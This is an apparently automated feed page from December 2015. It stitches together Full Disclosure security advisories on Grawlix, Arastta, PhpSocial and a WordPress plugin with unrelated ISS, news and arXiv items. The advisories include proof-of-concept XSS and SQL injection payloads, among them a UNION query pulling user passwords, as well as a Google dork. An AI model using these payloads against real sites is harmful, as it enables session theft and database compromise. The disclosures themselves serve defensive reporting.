Security Advisory - Curesec Research Team 1. Introduction Affected Product: Grawlix 1.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/1Yxrde6 Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3 and possibly prior versions, it contains multiple reflected XSS vulnerabilities. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection. 3. Details XSS 1 When searching for a book in the admin area, the keyword parameter is echoed unencoded inside the value attribute of an input tag, leading to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/book.view.php?keyword=" autofocus onfocus="alert(1) Code: _admin/book.view.php
XSS 2 The slot.label-set.ajax.php script echoes all GET parameters unencoded, leading to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/slot.label-set.ajax.php?x= Code: _admin/slot.label-set.ajax.php echo '
$_GET|';print_r($_GET);echo '|
'; XSS 3 The edit_id parameter of the site.nav-edit.ajax.php is vulnerable to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id=">Code: _admin/site.nav-edit.ajax.php $edit_id = $_GET['edit_id']; [...] $modal->value($edit_id); _admin/lib/GrlxForm.php $this->value ? $value = ' value="'.$this->value.'"' : null; XSS 4 When viewing the book overview, the start_sort_order parameter is vulnerable to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order=" onmouseover="alert(1) Code: _admin/book.view.php $delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order"); XSS 5 (limited) In two scripts, the page_id value is put into a hidden input element without encoding quotes. It may be possible to execute JavaScript via a style element in older browsers. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id=" style="STYLE http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id=" style="STYLE 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: http://ift.tt/1NCqGiG

Source: Gmail -> IFTTT-> Blogger

[FD] Arastta 1.1.5: SQL Injection

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Arastta 1.1.5 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://arastta.org/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Arastta is an eCommerce software written in PHP. In version 1.1.5, it is vulnerable to two SQL injection vulnerabilities, one normal injection when searching for products via tags, and one blind injection via the language setting. Both of them require a user with special privileges to trigger. 3. SQL Injection 1 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description There is an SQL Injection when retrieving products. Currently, only the "filter" variable is vulnerable. Note that the "tag_name" variable would also be vulnerable to SQL injection, if there wasn't a filter that forbid single quotes in the URL. As defense in depth, it might be a good idea to sanitize that value here as well. Note that an account with the right "Catalog -> Filters" is needed to exploit this issue. Proof of Concept POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1 tag_text[][value]=abc') union all select password from gv4_user -- - Code /admin/model/catalog/product.php public function getTags($tag_name, $filter_tags = null) { [...] $query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter); /admin/controller/catalog/product.php public function autocomplete() { [...] if (isset($this->request->get['tag_name'])) { $this->load->model('catalog/product'); if (isset($this->request->get['tag_name'])) { $tag_name = $this->request->get['tag_name']; } else { $tag_name = ''; } $filter = null; if(isset($this->request->post['tag_text'])) { $filter = $this->request->post['tag_text']; } $results = $this->model_catalog_product->getTags($tag_name, $filter); foreach ($results as $result) { $json[] = array( 'tag' => $result, 'tag_id' => $result ); } } 4. SQL Injection 2 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description There is a second order timing based SQL injection when choosing the language setting. An admin account with the right "Setting -> Setting" is needed to exploit this issue. Alternatively, a user with the right "Localisation -> Languages" can inject a payload as well. However, a user with the right "Setting -> Setting" is still needed to choose the malicious language to trigger the payload. Proof of Concept Visit the setting page: http://localhost/Arastta/admin/index.php?route=setting/setting For the config_language and config_admin_language parameters use: en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) -- - Visiting any site will trigger the injected code. Code /Arastta/system/library/utility.php public function getDefaultLanguage(){ if (!is_object($this->config)) { return; } $store_id = $this->config->get('config_store_id'); if (Client::isAdmin()){ $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'"; } else { $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'"; } $query = $this->db->query($sql); $code = $query->row['value']; $language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'"); return $language->row; } 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/17/2015 Disclosed to public Blog Reference: http://ift.tt/1NCqEY9

Source: Gmail -> IFTTT-> Blogger

[FD] Arastta 1.1.5: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Arastta 1.1.5 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://arastta.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Arastta is an eCommerce software written in PHP. In version 1.1.5, a given URL is echoed unencoded, leading to XSS. This can be used to inject JavaScript keyloggers or to bypass CSRF protection. If the victim is an admin with the right "Tool -> File Manager", this can lead to code execution via the file manager. 3. Proof of Concept http://localhost/Arastta/index.php/desktops/pc">?sort=pd.name&order=DESC 4. Code /catalog/view/theme/default/template/common/header.tpl 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/17/2015 Disclosed to public Blog Reference: http://ift.tt/1YBdRIz

Source: Gmail -> IFTTT-> Blogger

[FD] PhpSocial v2.0.0304: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: PhpSocial v2.0.0304_20222226 Fixed in: not fixed Fixed Version Link: n/a Vendor Webite: http://phpsocial.net Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description PhpSocial is a social networking software written in PHP. In version v2.0.0304, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. 3. Proof of Concept Add a new admin:
4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/21/ Contacted Vendor (no reply) 2015 12/10/ Tried to remind vendor (no email is given, security@phpsocial.net does 2015 not exist, and contact form could not be used because the website is down) 12/21/ Disclosed to public 2015 Blog Reference: http://ift.tt/1OnBHIb

Source: Gmail -> IFTTT-> Blogger

[FD] PhpSocial v2.0.0304: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: PhpSocial v2.0.0304_20222226 Fixed in: not fixed Fixed Version Link: n/a Vendor Webite: http://phpsocial.net Vulnerability Type: XSS / Open Redirect Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description PhpSocial is a social networking software written in PHP. In version v2.0.0304, the profile fields Name, Birthday, Street Address, City, State, Country, and Phone Number are open to persistent XSS. This can lead to the stealing of cookies, injection of JavaScript keyloggers, and bypassing of CSRF protection. In this case, this can lead to code execution via the template editor. 3. Proof of Concept Visit Profile: http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/ Profile.php?user=[USERNAME] Click edit and use the following for any of the vulnerable fields: 4. Open Redirect CVSS Low 2.1 AV:N/AC:H/Au:S/C:N/I:P/A:N Description PhpSocial is also vulnerable to a reflected open redirect, which may for example be used in phishing attacks. The attack only works if the victim is logged in to PhpSocial. Proof of Concept http://localhost//PhpSocial_v2.0.0304_20222226/cms_phpsocial/ UserEditprofileStatus.php?status_new=foobar&task=dosave&return_url=http:// google.com 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/ Contacted Vendor (no reply) 2015 12/10/ Tried to remind vendor (no email is given, security@phpsocial.net does 2015 not exist, and contact form could not be used because the website is down) 12/21/ Disclosed to public 2015 Blog Reference: http://ift.tt/1O9CPgG

Source: Gmail -> IFTTT-> Blogger

ISS Daily Summary Report – 12/22/15

Ocular Health:  One year crewmembers Kelly and Kornienko completed vision and tonometry tests and took blood pressure measurements as part of their Flight Day 270 Ocular Health testing.  The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risks of microgravity-induced visual impairment and increased intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines.   Sleep Log:  Kelly recorded a Sleep Log entry today. The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Veg-01 Anomaly:  Kelly refilled the Veg-01 plant pillows with water today.  He noted an unexpected growth on the plants and sent pictures for ground experts to evaluate.  In coordination with those experts he subsequently removed affected plant areas and double bagged and inserted them into a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return to the ground.  He also increased the Veggie facility fan speed to compensate for extra moisture observed in the pillows and on the plants.  The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility.  For this run, Zinnias will be grown for 60 days and are expected to produce flowers.   Journals:  Kelly completed a Journals entry today. The Journals investigation obtains information on behavioral and human issues that are relevant to the design of equipment and procedures used by astronauts during extended-duration missions. Study results provide information used in preparations for future missions to low-Earth orbit and beyond.   Cardio Ox:  Peake, with assistance from Kelly, collected blood pressure and ultrasound measurements of his carotid and brachial arteries for this Flight Day 15 Cardio Ox session.  The objective of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts. Twelve crewmembers will provide blood and urine samples to assess biomarkers before launch, 15 and 60 days after launch, 15 days before returning to Earth, and within days after landing. Ultrasound scans are obtained at the same time points and through 5 years after landing.   Habitability Video and Observations:  Kopra set up his iPad and recorded the first 10 minutes of his exercise session on Treadmill 2 (T2).  He narrated details such as hardware interface issues, volume needed to perform exercise, or other human factors concerns for set-up and task performance.  He documented additional observations on human factors and habitability from his last 3 to 4 days on the ISS. Topics may include any significant habitability related changes or improvements to the ISS Kopra has noticed since his previous time onboard the ISS.  Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars.  Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.   Dose Tracker:  Kopra and Peake were unable to complete entries for medication tracking because both experienced issues with logging on to the Dose Tracker application that runs on an iPad.  Ground experts are working on troubleshooting procedures that are scheduled to be performed on Thursday.  This investigation documents the medication usage of crew members before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data are expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) is occurring during missions.   Human Research Facility (HRF)-2 Resupply:  Kopra restocked the HRF supply kits in the HRF2 rack in the Columbus module and remove expired limited life items.  He then took photographs of the kits for downlink.   Circadian Rhythms:  Peake configured and donned the Armband Monitor and Thermolab sensors and belt for his Flight Day 15 Circadian Rhythm session.  He will wear the monitors for 36 hours and then doff and download the data on Thursday.  Circadian Rhythms investigates the role of synchronized circadian rhythms, or the “biological clock,” and how it changes during long-duration spaceflight. Researchers hypothesize that a non-24-hour cycle of light and dark affects crewmembers’ circadian clocks. The investigation also addresses the effects of reduced physical activity, microgravity and an artificially controlled environment. Changes in body composition and body temperature, which also occur in microgravity, can affect crewmembers’ circadian rhythms as well. Understanding how these phenomena affect the biological clock will improve performance and health for future crewmembers.   Post-Extravehicular Activity (EVA) Activities:  Today, USOS crewmembers participated in an EVA #34 debrief with ground specialists to discuss details of yesterday’s EVA.  In addition, Kelly and Kopra deconfigured the US Airlock following EVA operations and prepared Extravehicular Mobility Units (EMU) and equipment for stowage.   Today’s Planned Activities All activities were completed unless otherwise noted. Morning Inspection, Laptop RS1(2) Reboot RSS1,2 Reboot SLEEP – Filling in Questionnaire Morning Inspection, SM ПСС (Caution & Warning Panel) Test МО-8. HW Setup Body Mass Measurement CARDOX МО-8. Closeout ops Antivirus Scan Results Checkout on SSC Laptops and Report Daily Planning Conference (S-band) WRS – recirculation system tank fill On MCC Go Regeneration of absorption cartridge Ф2 of TCPU [БМП] Recharge […]

from ISS On-Orbit Status Report http://ift.tt/1RGiKB2
via IFTTT

Re: [FD] Wordpress Content Text Slider on Post 6.8 - Persistent Vulnerability

The POST request contains a CSRF nonce that is validated by the server and an administrator user is the only role that is able to use the plugin (at least by default). Only an administrator user is able to execute JavaScript using the issue you described due to the limitations I mentioned above. An administrator user already has the permission to embed JavaScript and execute PHP within WordPress as long as they have a valid CSRF nonce. This is a none issue IMO, although it is recommended that the plugin does sanitise user input and encode user output. But in its current form I can not see how this is exploitable. On Tue, Dec 22, 2015 at 3:58 PM, Vulnerability Lab < research@vulnerability-lab.com> wrote: > Document Title: > =============== > Wordpress Content Text Slider on Post 6.8 - Persistent Vulnerability > > > References (Source): > ==================== > http://ift.tt/1Z7C5MK > > > Release Date: > ============= > 2015-12-07 > > > Vulnerability Laboratory ID (VL-ID): > ==================================== > 1655 > > > Common Vulnerability Scoring System: > ==================================== > 3.5 > > > Product & Service Introduction: > =============================== > Content text slider on post is a WordPress plugin from gopiplus.com > website. We can use this plugin to scroll the content vertically in the > posts and pages. We have option to enter content title, description and > link for the content. All entered details scroll vertically into the > posts and pages. Yes we can enter the html content into the description > text area also we can include the images into the scroller. > > (Copy of the Vendor Homepage: > http://ift.tt/1S89B3A ) > > > Abstract Advisory Information: > ============================== > An independent vulnerability laboratory researcher discovered an > application-side cross site scripting web vulnerability in the Wordpress > Content Text Slider v6.8 web-application. > > > Vulnerability Disclosure Timeline: > ================================== > 2015-12-07: Public Disclosure (Vulnerability Laboratory) > > > Discovery Status: > ================= > Published > > > Affected Product(s): > ==================== > GoPiPlus > Product: Content Text Slider On Post - Plugin (Web-Application) 6.8 > > > Exploitation Technique: > ======================= > Remote > > > Severity Level: > =============== > Medium > > > Technical Details & Description: > ================================ > An application-side POST inject web vulnerability has been discovered in > the Wordpress Content Text Slider v6.8 web-application. > The vulnerability allows remote attackers to inject own malicious script > codes to the application-side of the online-service. > > The vulnerability is located in the `page` value parameter of the > `options-general.php` file. Remote attackers are able to inject > via POST method request to the `Title` or `Message/Content` input fields. > After that the attacker is able to execute the code by > usage of the insert details button. The execution of the malicious > injected script code occurs in the `All popups` module when > processing to request manually. An attacker is able to steal the admin > cookie by usage of a moderator account. The attack vector > is persistent on the application-side and the request method to inject is > POST. > > The security risk of the application-side web vulnerability is estimated > as medium with a cvss (common vulnerability scoring system) count of 3.5. > Exploitation of the application-side web vulnerability requires no > privilege web-application user account and only low or medium user > interaction. > Successful exploitation of the vulnerabilities results in persistent > phishing, session hijacking, persistent external redirect to malicious > sources and application-side manipulation of affected or connected module > context. > > Request Method(s): > [+] POST > Vulnerable File(s): > [+] options-general.php > Vulnerable Module(s): > [+] Title or Message/Content > Vulnerable Parameter(s): > [+] page > Affected Module(s): > [+] All popups > > > Proof of Concept (PoC): > ======================= > The vulnerbaility can be exploited by remote attackers without privilege > web-application user account and low or medium user interaction. > For security demonstration or to reproduce the vulnerability follow the > provided information and steps below to continue. > > Google Dork: inurl:/wp-content/plugins/content-text-slider-on-post/ > > Manual steps to reproduce the vulnerability ... > 1. First you should Install content text slider on post > 2. Add the following details as link > Note: > http://localhost:8080/wp-admin/options-general.php?page=content-text-slider-on-post&ac=add > 3. In the "Title" or "Message/Content" text area you can input place your > javascript code and click on "insert detail" button > 4. Execute the javascript codes in the "All popups" page > Note: > http://localhost:8080/wp-admin/options-general.php?page=content-text-slider-on-post > 5. Successful reproduce of the vulnerability! > > Note: Attackers can steal admin cookie with moderator access to compromise > the account system of the wordpress application and connected dbms. > > > Security Risk: > ============== > The security risk of the persistent POST Inject web vulnerability in the > wordpress content text slider module is estimated as medium. (CVSS 3.5) > > > Credits & Authors: > ================== > ALIREZA_PROMIS > Special Thanks : Sajjad Sotoudeh [Forum: http://ift.tt/1S89BjS] > Friends: Mr.Moein , sheytan azzam , Mr.PERSIA , HellBoy.Blackhat, Jok3r > , Kamran Helish , Dr.RooT > > > Disclaimer & Information: > ========================= > The information provided in this advisory is provided as it is without any > warranty. Vulnerability Lab disclaims all warranties, either expressed > or implied, including the warranties of merchantability and capability for > a particular purpose. Vulnerability-Lab or its suppliers are not liable > in any case of damage, including direct, indirect, incidental, > consequential loss of business profits or special damages, even if > Vulnerability-Lab > or its suppliers have been advised of the possibility of such damages. > Some states do not allow the exclusion or limitation of liability for > consequential or incidental damages so the foregoing limitation may not > apply. We do not approve or encourage anybody to break any vendor licenses, > policies, deface websites, hack into databases or trade with fraud/stolen > material. > > Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com > - http://ift.tt/1kouTut > Contact: admin@vulnerability-lab.com - > research@vulnerability-lab.com - > admin@evolution-sec.com > Section: magazine.vulnerability-db.com - > http://ift.tt/1zNuo47 - > http://ift.tt/1wo6y8x > Social: http://twitter.com/#!/vuln_lab - > http://ift.tt/1kouSqa - > http://youtube.com/user/vulnerability0lab > Feeds: http://ift.tt/1iS1DH0 - > http://ift.tt/1kouSqh - > http://ift.tt/1kouTKS > Programs: http://ift.tt/1iS1GCs - > http://ift.tt/1iS1FyF - > http://ift.tt/1kouSqp > > Any modified copy or reproduction, including partially usages, of this > file requires authorization from Vulnerability Laboratory. Permission to > electronically redistribute this alert in its unmodified form is granted. > All other rights, including the use of other media, are reserved by > Vulnerability-Lab Research Team or its suppliers. All pictures, texts, > advisories, source code, videos and other information on this website > is trademark of vulnerability-lab team & the specific authors or managers. > To record, list (feed), modify, use or edit our material contact > (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a > permission. > > Copyright © 2015 | Vulnerability > Laboratory - [Evolution Security GmbH]™ > >

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability

Title corrected Symfony CMS to Symphony CMS. ================================================================ Symphony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

[FD] Executable installers are vulnerable^WEVIL (case 15): F-SecureOnlineScanner.exe allows arbitrary (remote) code execution and escalation of privilege

I have a new follower on Twitter


Football Fans
World's first fan-run pro sports franchise. Fans decide everything from mascot to in-game play calls via proprietary technology. Let's do this.
Dallas
https://t.co/TVVRuzQgIx
Following: 3487 - Followers: 2210

December 23, 2015 at 09:22AM via Twitter http://twitter.com/ProFootball_Fan

Anonymous declares cyber war on Turkey

This is the melodramatic sign-off of the latest video threat from cyber activist group Anonymous, announcing that they are now aiming their unique ...

from Google Alert - anonymous http://ift.tt/1JuIBnH
via IFTTT

Anonymous declares cyber war on Turkish government websites, citing Ankara's support of Islamic ...

The Anonymous hacktivist group has taken responsibility for a powerful cyber-attack on the Turkish sector of the internet last week. It promised to ...

from Google Alert - anonymous http://ift.tt/1JuICb2
via IFTTT

130 Celebrities' Email Accounts Hacked; Hacker Stole Movie Scripts and Sex Tapes

Breaking News: A 23-year-old Bahamian man has been arrested and charged with hacking into the email accounts of 130 celebrities and stealing the unreleased movie and TV scripts, sex tapes, explicit images and even the upcoming album of a famous A-List Celebrity. The hacker named Alonzo Knowles contacted a famous radio host to sell the stolen scripts for the first six episodes of a hit


from The Hacker News http://ift.tt/1NLlQh6
via IFTTT

Kim Dotcom loses Fight Against Extradition to the US

Internet millionaire and Megaupload founder Kim Dotcom and his three associates are eligible for extradition to the US to face criminal charges over massive copyright infringement on Megaupload (now-shuttered), the court has ruled citing "overwhelming" evidence. On Tuesday afternoon, New Zealand District Court Judge Nevin Dawson told the court that the United States had presented enough


from The Hacker News http://ift.tt/1NL8am8
via IFTTT

NASA Images Show Human Fingerprint on Global Air Quality - Release Materials

Using new, high-resolution global satellite maps of air quality indicators, NASA scientists tracked air pollution trends over the last decade in various regions and 195 cities around the globe. According to recent NASA research findings, the United States, Europe and Japan have improved air quality thanks to emission control regulations, while China, India and the Middle East, with their fast-growing economies and expanding industry, have seen more air pollution. Scientists examined observations made from 2005 to 2014 by the Ozone Monitoring Instrument aboard NASA's Aura satellite. One of the atmospheric gases the instrument detects is nitrogen dioxide, a yellow-brown gas that is a common emission from cars, power plants and industrial activity. Nitrogen dioxide can quickly transform into ground-level ozone, a major respiratory pollutant in urban smog. Nitrogen dioxide hotspots, used as an indicator of general air quality, occur over most major cities in developed and developing nations. The following visualizations include two types of data. The absolute concentrations show the concentration of tropospheric nitrogen dioxide, with blue and green colors denoting lower concentrations and orange and red areas indicating higher concentrations. The second type of data is the trend data from 2005 to 2014, which shows the observed change in concentration over the ten-year period. Blue indicated an observed decrease in nitrogen dioxide, and orange indicates an observed increase. Please note that the range on the color bars (text is in white) changes from location to location in order to highlight features seen in the different geographic regions.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1Zoxm9F
via IFTTT

Tuesday, December 22, 2015

Ravens: G Marshal Yanda and P Sam Koch selected to Pro Bowl (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Addressing Complex and Subjective Product-Related Queries with Customer Reviews. (arXiv:1512.06863v1 [cs.IR])

Online reviews are often our first port of call when considering products and purchases online. When evaluating a potential purchase, we may have a specific query in mind, e.g. `will this baby seat fit in the overhead compartment of a 747?' or `will I like this album if I liked Taylor Swift's 1989?'. To answer such questions we must either wade through huge volumes of consumer reviews hoping to find one that is relevant, or otherwise pose our question directly to the community via a Q/A system.

In this paper we hope to fuse these two paradigms: given a large volume of previously answered queries about products, we hope to automatically learn whether a review of a product is relevant to a given query. We formulate this as a machine learning problem using a mixture-of-experts-type framework---here each review is an `expert' that gets to vote on the response to a particular query; simultaneously we learn a relevance function such that `relevant' reviews are those that vote correctly. At test time this learned relevance function allows us to surface reviews that are relevant to new queries on-demand. We evaluate our system, Moqa, on a novel corpus of 1.4 million questions (and answers) and 13 million reviews. We show quantitatively that it is effective at addressing both binary and open-ended queries, and qualitatively that it surfaces reviews that human evaluators consider to be relevant.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1mz8de0
via IFTTT

Restricted Predicates for Hypothetical Datalog. (arXiv:1512.06945v1 [cs.DB])

Hypothetical Datalog is based on an intuitionistic semantics rather than on a classical logic semantics, and embedded implications are allowed in rule bodies. While the usual implication (i.e., the neck of a Horn clause) stands for inferring facts, an embedded implication plays the role of assuming its premise for deriving its consequence. A former work introduced both a formal framework and a goal-oriented tabled implementation, allowing negation in rule bodies. While in that work positive assumptions for both facts and rules can occur in the premise, negative assumptions are not allowed. In this work, we cover this subject by introducing a new concept: a restricted predicate, which allows negative assumptions by pruning the usual semantics of a predicate. This new setting has been implemented in the deductive system DES.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1S9OZb1
via IFTTT

On the Differential Privacy of Bayesian Inference. (arXiv:1512.06992v1 [cs.AI])

We study how to communicate findings of Bayesian inference to third parties, while preserving the strong guarantee of differential privacy. Our main contributions are four different algorithms for private Bayesian inference on proba-bilistic graphical models. These include two mechanisms for adding noise to the Bayesian updates, either directly to the posterior parameters, or to their Fourier transform so as to preserve update consistency. We also utilise a recently introduced posterior sampling mechanism, for which we prove bounds for the specific but general case of discrete Bayesian networks; and we introduce a maximum-a-posteriori private mechanism. Our analysis includes utility and privacy bounds, with a novel focus on the influence of graph structure on privacy. Worked examples and experiments with Bayesian na{\"i}ve Bayes and Bayesian linear regression illustrate the application of our mechanisms.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1S9OWfw
via IFTTT

Beauty and Brains: Detecting Anomalous Pattern Co-Occurrences. (arXiv:1512.07048v1 [cs.AI])

Our world is filled with both beautiful and brainy people, but how often does a Nobel Prize winner also wins a beauty pageant? Let us assume that someone who is both very beautiful and very smart is more rare than what we would expect from the combination of the number of beautiful and brainy people. Of course there will still always be some individuals that defy this stereotype; these beautiful brainy people are exactly the class of anomaly we focus on in this paper. They do not posses rare qualities, but it is the unexpected combination of factors that makes them stand out.

In this paper we define the above described class of anomaly and propose a method to quickly identify them in transaction data. Further, as we take a pattern set based approach, our method readily explains why a transaction is anomalous. The effectiveness of our method is thoroughly verified with a wide range of experiments on both real world and synthetic data.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1mz8bms
via IFTTT

Keeping it Short and Simple: Summarising Complex Event Sequences with Multivariate Patterns. (arXiv:1512.07056v1 [cs.AI])

We study how to obtain concise descriptions of discrete multivariate sequential data in terms of rich multivariate sequential patterns that can capture potentially highly interesting (cor)relations between sequences. To this end we allow our pattern language to span over the alphabets (domains) of all sequences, allow patterns to overlap temporally, and allow for gaps in their occurrences. We formalise our goal by the Minimum Description Length principle, by which our objective is to discover the set of patterns that provides the most succinct description of the data. To discover good pattern sets, we introduce Ditto, an efficient algorithm to approximate the ideal result. We support our claim with a set of experiments on both synthetic and real data.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1TgfF8q
via IFTTT

SR-Clustering: Semantic Regularized Clustering for Egocentric Photo Streams Segmentation. (arXiv:1512.07143v1 [cs.AI])

While wearable cameras are becoming increasingly popular, locating relevant information in large unstructured collections of egocentric images is still a tedious and time consuming processes. This paper addresses the problem of organizing egocentric photo streams acquired by a wearable camera into semantically meaningful segments. First, contextual and semantic information is extracted for each image by employing a Convolutional Neural Networks approach. Later, by integrating language processing, a vocabulary of concepts is defined in a semantic space. Finally, by exploiting the temporal coherence in photo streams, images which share contextual and semantic attributes are grouped together. The resulting temporal segmentation is particularly suited for further analysis, ranging from activity and event recognition to semantic indexing and summarization. Experiments over egocentric sets of nearly 17,000 images, show that the proposed approach outperforms state-of-the-art methods.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1mz8cXA
via IFTTT

Heuristic algorithms for finding distribution reducts in probabilistic rough set model. (arXiv:1512.07162v1 [cs.AI])

Attribute reduction is one of the most important topics in rough set theory. Heuristic attribute reduction algorithms have been presented to solve the attribute reduction problem. It is generally known that fitness functions play a key role in developing heuristic attribute reduction algorithms. The monotonicity of fitness functions can guarantee the validity of heuristic attribute reduction algorithms. In probabilistic rough set model, distribution reducts can ensure the decision rules derived from the reducts are compatible with those derived from the original decision table. However, there are few studies on developing heuristic attribute reduction algorithms for finding distribution reducts. This is partly due to the fact that there are no monotonic fitness functions that are used to design heuristic attribute reduction algorithms in probabilistic rough set model. The main objective of this paper is to develop heuristic attribute reduction algorithms for finding distribution reducts in probabilistic rough set model. For one thing, two monotonic fitness functions are constructed, from which equivalence definitions of distribution reducts can be obtained. For another, two modified monotonic fitness functions are proposed to evaluate the significance of attributes more effectively. On this basis, two heuristic attribute reduction algorithms for finding distribution reducts are developed based on addition-deletion method and deletion method. In particular, the monotonicity of fitness functions guarantees the rationality of the proposed heuristic attribute reduction algorithms. Results of experimental analysis are included to quantify the effectiveness of the proposed fitness functions and distribution reducts.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1mz8bmo
via IFTTT

Diffusion Methods for Classification with Pairwise Relationships. (arXiv:1505.06072v3 [cs.AI] UPDATED)

We define two algorithms for propagating information in classification problems with pairwise relationships. The algorithms are based on contraction maps and are related to non-linear diffusion and random walks on graphs. The approach is also related to message passing algorithms, including belief propagation and mean field methods. The algorithms we describe are guaranteed to converge on graphs with arbitrary topology. Moreover they always converge to a unique fixed point, independent of initialization. We prove that the fixed points of the algorithms under consideration define lower-bounds on the energy function and the max-marginals of a Markov random field. The theoretical results also illustrate a relationship between message passing algorithms and value iteration for an infinite horizon Markov decision process. We illustrate the practical application of the algorithms under study with numerical experiments in image restoration, stereo depth estimation and binary classification on a grid.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1FOdRkA
via IFTTT

Black-Box Policy Search with Probabilistic Programs. (arXiv:1507.04635v3 [stat.ML] UPDATED)

